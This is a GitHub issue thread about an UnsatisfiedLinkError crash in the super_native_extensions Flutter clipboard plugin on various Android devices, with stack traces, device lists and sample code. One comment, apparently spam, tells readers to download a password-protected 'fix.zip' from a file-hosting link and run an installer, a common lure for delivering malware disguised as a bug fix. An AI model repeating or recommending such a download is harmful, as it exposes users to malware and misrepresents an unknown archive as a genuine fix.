### ISSUE TITLE
UnsatisfiedLinkError crash in getAllMimeTypesForURI

### ISSUE THREAD

**Issue by kreativityapps** [superlistapp/super_native_extensions#421]
Using `super_clipboard: ^0.8.19` some users get the following crash:

```
Fatal Exception: java.lang.UnsatisfiedLinkError: No implementation found for java.lang.String[] com.superlist.super_native_extensions.DataProvider.getAllMimeTypesForURI(java.lang.String, java.lang.String) (tried Java_com_superlist_super_1native_1extensions_DataProvider_getAllMimeTypesForURI and Java_com_superlist_super_1native_1extensions_DataProvider_getAllMimeTypesForURI__Ljava_lang_String_2Ljava_lang_String_2) - is the library loaded, e.g. System.loadLibrary?
       at com.superlist.super_native_extensions.DataProvider.getAllMimeTypesForURI(DataProvider.java)
       at com.superlist.super_native_extensions.DataProvider.getMimeTypeForURI(DataProvider.java:78)
       at com.superlist.super_native_extensions.DataProvider.openTypedAssetFile(DataProvider.java:52)
       at android.content.ContentProvider$Transport.openTypedAssetFile(ContentProvider.java:574)
       at android.content.ContentProviderNative.onTransact(ContentProviderNative.java:327)
       at android.os.Binder.execTransactInternal(Binder.java:1326)
       at android.os.Binder.execTransact(Binder.java:1268)
        
```

I can't reproduce it myself, but from analytics I can see that it occurs on Android versions between 9-14 and different device types.

My config:
[✓] Flutter (Channel stable, 3.24.1, on macOS 14.5 23F79 darwin-arm64)
[✓] Android toolchain - develop for Android devices (Android SDK version 34.0.0)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by knopp** [comment]
Can you determine if those device have anything in common? I'd need to be able to reproduce this.

**Comment by kreativityapps** [comment]
Not really.
Most crashes are on Xiaomi Redmi 9A (32%) and on Android 11 (44%)
Other devices are:
- other Xiaomi devices (Redmi Note 8, Redmi A2)
- Lenovo Mobile (Lenovo Tab M10 Plus 3rd Gen, Lenovo Tab M11)
- Oppo (RMX3627, Realme 9i)
- HCT Mobile - FIH Foxconn (BV4900Pro)

**Comment by shamil-pp** [comment]
I am getting this error on

Realme c11
Redmi 9
Vivo y17
Vivo v50
Poco m2 pro
Oppo f17

Including Android versions A18,A10,A11,A15. 88% in A11.

I couldn't find similarities between these devices.

**Comment by shamil-pp** [comment]
`Fatal Exception: java.lang.UnsatisfiedLinkError
No implementation found for java.lang.String[] com.superlist.super_native_extensions.DataProvider.getAllMimeTypesForURI(java.lang.String, java.lang.String) (tried Java_com_superlist_super_1native_1extensions_DataProvider_getAllMimeTypesForURI and Java_com_superlist_super_1native_1extensions_DataProvider_getAllMimeTypesForURI__Ljava_lang_String_2Ljava_lang_String_2)`

Code. 

`var clipbpoard = SystemClipboard.instance;
        if (clipbpoard != null) {
          final item = DataWriterItem();
          item.add(Formats.webp(fileData));
          await clipbpoard.write([item]);
          final data = await clipbpoard.read();
          if (data.canProvide(Formats.webp)) {
            data.getFile(Formats.webp, (file) {
              if (ref.context.mounted == false) return;
              showStickerCopiedSheet(ref.context, ref);
            });
          }
        }`
